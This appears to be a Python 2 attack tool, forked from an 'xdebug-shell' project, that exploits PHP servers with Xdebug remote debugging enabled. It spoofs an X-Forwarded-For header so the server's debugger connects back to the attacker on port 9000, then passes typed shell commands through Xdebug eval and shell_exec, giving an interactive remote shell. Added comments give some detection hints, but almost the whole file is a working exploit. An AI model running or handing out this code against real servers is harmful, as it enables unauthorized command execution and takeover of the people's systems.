forked from gteissier/xdebug-shell
xdebug-shell.py
#!/usr/bin/env python2
import socket
from defusedxml.ElementTree import fromstring
import pipes
import sys
import argparse
import thread
import requests
from urlparse import urlparse, parse_qs
import random
import string
# Command-line interface: both options are optional and default to None.
parser = argparse.ArgumentParser()
parser.add_argument(
    '-l', '--local-host',
    default=None,
    help='local fqdn or IP address where xdebug will connect to on port 9000',
)
parser.add_argument(
    '-u', '--url',
    default=None,
    help='url to activate xdebug on',
)
args = parser.parse_args()

# Listening TCP socket for the debugger engine's inbound connection.
# It is bound to every local interface ('0.0.0.0') on port 9000 with a
# backlog of 10; nothing here restricts which peer may connect.
sk = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sk.bind(('0.0.0.0', 9000))
sk.listen(10)
def rand_id(n=6):
    """Return ``n`` characters picked at random from ``string.ascii_letters``.

    The result is used by ``start_xdebug`` as a throwaway session label.
    ``random`` is not a cryptographic generator, so this helper must not be
    reused for tokens or secrets.
    """
    return ''.join(random.choice(string.ascii_letters) for _ in range(n))
def start_xdebug(url, lhost):
    """Send one GET to ``url`` with an ``XDEBUG_SESSION_START`` query parameter.

    When ``lhost`` is not None it is also sent as the ``X-Forwarded-For``
    header; otherwise no extra header is added. The request is made without a
    timeout, and the final ``assert`` (skipped under ``python -O``) only checks
    for a 2xx status.

    NOTE(review): this presumably depends on the server running Xdebug with
    remote debugging enabled and the client address taken from the request
    (``xdebug.remote_connect_back`` in Xdebug 2, ``xdebug.discover_client_host``
    in Xdebug 3) -- confirm against the target configuration. Hosts that do
    not load Xdebug, or that pin the debugger client host, are not affected;
    requests carrying ``XDEBUG_SESSION_START`` are a useful log signal.
    """
    request_kwargs = {'params': {'XDEBUG_SESSION_START': rand_id()}}
    if lhost is not None:
        request_kwargs['headers'] = {'X-Forwarded-For': lhost}
    r = requests.get(url, **request_kwargs)
    assert(200 <= r.status_code < 300)
# Only when a URL was supplied: send the triggering HTTP request from a
# background thread, so the main thread can already be waiting in accept()
# when the debugger engine connects.
if args.url is not None:
    thread.start_new_thread(start_xdebug, (args.url, args.local_host))
# Block until the first inbound connection on port 9000. Whichever peer
# connects first is used; `addr` is never compared with an expected address.
conn, addr = sk.accept()
def pop_xdebug(client_data):
    """Parse one NUL-framed debugger message and return its ``<property>`` text.

    ``client_data`` has to split on NUL into exactly three fields: a decimal
    length, the XML payload, and a trailing field that is ignored. Any other
    field count raises ``ValueError`` from the unpacking, and a payload whose
    length differs from the declared one trips the ``assert``.

    The payload comes from the remote peer, so it is parsed with the
    ``fromstring`` the file imports from ``defusedxml`` rather than the plain
    standard-library parser.

    Returns ``None`` when the document has no direct
    ``{urn:debugger_protocol_v1}property`` child, otherwise that element's
    text.
    """
    declared_len, payload, _ = client_data.split('\x00')
    declared_len = int(declared_len, 10)
    assert(len(payload) == declared_len)
    root = fromstring(payload)
    node = root.find('{urn:debugger_protocol_v1}property')
    return None if node is None else node.text
# pop xdebug greeting
# The first message on the connection is read with a single recv() of at most
# 1024 bytes and parsed; the parsed value is discarded (overwritten below).
client_data = conn.recv(1024)
data = pop_xdebug(client_data)
# Interactive loop: each line typed at the '>> ' prompt is sent to the
# connected debugger engine as an `eval` command and the reply is printed.
# What this looks like from the server side: a request carrying
# XDEBUG_SESSION_START, then an outbound TCP connection from the PHP host to
# port 9000 over which `eval` commands arrive. Outbound connections from web
# hosts to that port are worth alerting on where Xdebug is not expected.
while True:
    try:
        data = raw_input('>> ')
    except EOFError:
        # End of input (e.g. Ctrl-D) ends the session.
        break
    # Redirect stderr into stdout so error text is part of the captured output.
    data += ' 2>&1'
    # Wrap the line in a PHP expression that runs it via shell_exec() and
    # base64-encodes whatever it prints.
    php_command = 'base64_encode(shell_exec({}))'.format(pipes.quote(data))
    # `eval` with transaction id 1; the expression is base64-encoded (Python 2
    # 'base64' codec) and the command is terminated with a NUL byte.
    conn.sendall('eval -i 1 -- %s\x00' % php_command.encode('base64'))
    # Single read of at most 16384 bytes: a reply that is larger, or that
    # arrives in several segments, will not parse in pop_xdebug.
    client_data = conn.recv(16384)
    # pop_xdebug returns None when the reply has no <property> element, in which
    # case .decode raises AttributeError. One decode undoes the base64_encode()
    # in the PHP expression; the other presumably undoes the protocol's own
    # base64 encoding of the property value -- confirm.
    output = pop_xdebug(client_data).decode('base64').decode('base64')
    sys.stdout.write('%s' % output)
# Finish with a newline once the prompt loop has ended.
print('')